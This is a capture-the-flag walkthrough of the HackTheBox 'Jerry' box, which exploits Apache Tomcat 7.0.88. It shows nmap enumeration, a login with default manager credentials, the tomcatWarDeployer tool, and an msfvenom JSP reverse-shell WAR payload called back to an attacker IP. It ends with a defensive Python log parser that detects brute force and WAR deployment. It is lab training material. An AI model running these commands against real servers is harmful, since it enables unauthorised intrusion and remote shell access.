Today we are going to solve another HackTheBox machine, “Jerry”, created by mrh4sh. The lab mainly focuses on the exploitation of a Tomcat server.
Level: Easy
Attacking Strategy
- Network scanning
  - Nmap
- Recon
  - Tomcat enumeration
- Exploitation
  - tomcat 7.0.88 exploit
  - Virtual Environment setup
- Privilege Escalation
  - Manual Exploitation
Walkthrough
IP address: 10.129.1.110
We start by running an Nmap scan against the machine to enumerate the open ports and the services running on them.
Enumeration
nmap -sC -sV -p- 10.129.1.110 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 23:51 IST
Nmap scan report for 10.129.1.110
Host is up (0.16s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Nmap shows that port 8080 is open and that Apache Tomcat is running on it; the page title also reveals the version, 7.0.88, which is exploitable. After some googling we landed on an exploit that you can get from GitHub.
Exploitation

After reading the exploit and understanding its flow, we set up a virtual environment so that we can install the dependencies needed to run it.
git clone https://github.com/mgeeky/tomcatWarDeployer.git
cd tomcatWarDeployer
virtualenv -p python2 venv
source venv/bin/activate
pip install -r requirements.txt

Once everything is set, we also need credentials for the Tomcat server. After some googling we landed on a GitHub page listing default Tomcat credentials; after trying a few of them we got in with “admin:s3cret”. After a successful exploit we got an administrative shell and collected the flags.
python tomcatWarDeployer.py -U tomcat -P s3cret -H 10.10.14.79 -p 1234 10.129.1.110:8080 -x
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"

Manual Exploit
You can also exploit the box without the tomcatWarDeployer script. For this we need to create a Metasploit payload and upload it to the Tomcat server.
Once logged in to the manager application, simply go to the WAR file upload section, upload the payload file and deploy it.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.79 LPORT=5454 -f war > shell.war

Once the payload is uploaded successfully, we trigger it with curl and get the session.
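Both routes above end the same way: a WAR file pushed through the Tomcat manager, which leaves a trail in the manager's access log. As an added example (not part of this writeup or the tomcatWarDeployer project), the Python below parses default-format Tomcat access log lines and flags repeated 401s against /manager from one source followed by a successful upload/deploy; the log lines are constructed, reusing the attacker and target IPs from the writeup.

```python
import re
from collections import Counter

# Tomcat AccessLogValve default pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Manager endpoints that deploy a web application: the HTML upload form
# (used by the manual route) and the text/script API (used by deployer tools).
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy", "/manager/deploy")


def parse(line):
    """Return the fields of one access log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(lines, auth_fail_threshold=3):
    """Return failed-login sources at/over the threshold and successful deployments."""
    failures = Counter()
    deployments = []
    for line in lines:
        rec = parse(line)
        if not rec or not rec["path"].startswith("/manager"):
            continue
        path = rec["path"].split("?")[0]          # drop CSRF nonce / query string
        if rec["status"] == "401":
            failures[rec["host"]] += 1             # manager auth refused
        elif rec["status"][0] in "23" and rec["method"] in ("PUT", "POST") \
                and path in DEPLOY_PATHS:
            deployments.append((rec["host"], rec["user"], path))
    brute = {h: n for h, n in failures.items() if n >= auth_fail_threshold}
    return {"brute_force": brute, "deployments": deployments}


# Constructed sample log lines (not captured from the box).
SAMPLE = """\
10.10.14.79 - - [15/May/2021:23:55:01 +0530] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.79 - - [15/May/2021:23:55:03 +0530] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.79 - - [15/May/2021:23:55:05 +0530] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.79 - tomcat [15/May/2021:23:55:09 +0530] "GET /manager/html HTTP/1.1" 200 16482
10.10.14.79 - tomcat [15/May/2021:23:55:12 +0530] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 17210
10.129.1.50 - - [15/May/2021:23:56:00 +0530] "GET /docs/ HTTP/1.1" 200 8120
""".splitlines()

if __name__ == "__main__":
    print(analyse(SAMPLE))
```

A deployment by an account that has also generated 401s moments earlier is the pattern a defender would alert on; on a real server the same parser runs over `logs/localhost_access_log.*.txt`.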
nice